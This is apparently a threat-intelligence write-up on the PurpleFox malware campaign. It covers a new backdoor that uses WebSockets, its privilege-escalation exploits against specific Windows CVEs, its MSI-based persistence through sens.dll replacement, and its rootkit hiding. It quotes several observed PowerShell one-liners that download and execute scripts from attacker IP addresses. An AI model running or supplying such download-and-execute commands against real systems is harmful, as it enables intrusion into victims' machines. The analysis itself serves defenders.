PurpleFox Adds New Backdoor That Uses WebSockets

The activity starts with either of the following PowerShell commands being executed:

“cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘hxxp[[:]]//103.228.112.246[[:]]17881/57BC9B7E.Png’);MsiMake hxxp[[:]]//103.228.112.246[[:]]17881/0CFA042F.Png”
“cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http[:]//117.187.136.141[:]13405/57BC9B7E.Png’);MsiMake http[:]//117.187.136.141[:]13405/0CFA042F.Png”
These commands download a malicious payload from the specified URLs, which are hosted on multiple compromised servers. These servers are part of the PurpleFox botnet, with most of these located in China.
The fetched payload is a long script consisting of three components:

-Tater (Hot Potato – privilege escalation)
-PowerSploit
-Embedded exploit bundle binary (privilege escalation)

The script targets 64-bit architecture systems.
It starts by checking the Windows version and applied hotfixes for the vulnerabilities it is targeting.

Windows 7/Windows Server 2008
CVE-2020-1054 (KB4556836, KB4556843)
CVE-2019-0808 (KB4489878, KB4489885, KB2882822)
Windows 8/Windows Server 2012
CVE-2019-1458 (KB4530702, KB4530730)
Windows 10/Windows Server 2019
CVE-2021-1732 (KB4601354, KB4601345, KB4601315, KB4601319)
After selecting the appropriate vulnerability, it uses the PowerSploit module to reflectively load the embedded exploit bundle binary with the target vulnerability and an MSI command as arguments. As a failover, it uses the Tater module to launch the MSI command.

The goal is to install the MSI package as an admin without any user interaction.

The MSI package starts by removing the following registry keys, which are old Purple Fox installations if any are present:

HKLMSYSTEMCurrentControlSetServices{ac00-ac10}
It then installs the components (dbcode21mk.log and setupact64.log) of the Purple Fox backdoor to Windows directory. Afterward, it sets two registry values under the key “HKLMSYSTEMCurrentControlSetControlSession Manager”:

AllowProtectedRenames to 0x1, and
PendingFileRenameOperations
The MSI package then runs a .vbs script that creates a Windows firewall rule to block incoming connections on ports 135, 139, and 445. As a final step, the system is restarted to allow PendingFileRenameOperations to take place, replacing sens.dll, which will make the malware run as the System Event Notification Service (SENS).

The installed malware is a .dll file protected with VMProtect. Using the other data file installed by the MSI package, it unpacks and manually loads different DLLs for its functionality.
It also has a rootkit driver that is also unpacked from the data file and is used to hide its files, registry keys, and processes. The sample starts by copying itself to another file and installing a new service, then restoring the original sens.dll file.
Afterward, it loads the driver to hide its files and registries and then spawns and injects a sequence of a 32-bit process to inject its code modules into, as they are 32-bit DLLs.
The initial activity for retrieving this backdoor was captured three days after the previous PurpleFox intrusion attempts on the same compromised server.
Analysts flagged the following suspicious PowerShell commands:

“cmd.exe” /c powershell -c “iex((new-object Net.WebClient).DownloadString(‘hxxp[:]//185.112.144.245/a/1’))”
“cmd.exe” /c powershell -c “iex((new-object Net.WebClient).DownloadString(‘hxxp[:]//185.112.144.245/a/2’))”
“cmd.exe” /c powershell -c “iex((new-object Net.WebClient).DownloadString(‘hxxp[:]//185.112.144.245/a/3’))”
“cmd.exe” /c powershell -c “iex((new-object Net.WebClient).DownloadString(‘hxxp[:]//185.112.144.245/a/4’))”
“cmd.exe” /c powershell -c “iex((new-object Net.WebClient).DownloadString(‘hxxp[:]//185.112.144.245/a/5’))”
“cmd.exe” /c powershell -c “iex((new-object Net.WebClient).DownloadString(‘hxxp[:]//185.112.144.245/a/8’))”
“cmd.exe” /c powershell -c “iex((new-object Net.WebClient).DownloadString(‘hxxp[:]//185.112.144.245/a/9’))”

One notable characteristic analysts rarely see in malware is leveraging WebSocket communication to the C&C servers for an efficient bidirectional channel between the infected client and the server.

WebSocket is a communication technology that supports streams of data to be exchanged between a client and a server over just a single TCP session.
This is different from traditional request or response protocols like HTTP. This gives the threat actor a more covert alternative to HTTP requests and responses traffic, which creates an opportunity for a more silent exfiltration with less likelihood of being detected.

The client will verify the signed message by loading the RSA public key loaded from the configuration payload shown in the previous section.
If the signature is verified correctly, key material will be derived from the DH exchange and will be saved as the permanent symmetric AES encryption key (Symmetric_AES_key variable) that will be used as long as the WebSocket channel is active.

Once an efficient encrypted session is established over the WebSocket, the client will fingerprint the machine by extracting specific data (including the username, machine name, local IP, MAC address, and Windows version) and will relay such data over the secure channel to get the victim profiled at the server side, which is the final exchange before the WebSocket channel is fully established.
It will then listen for further commands, which will be covered in the next section.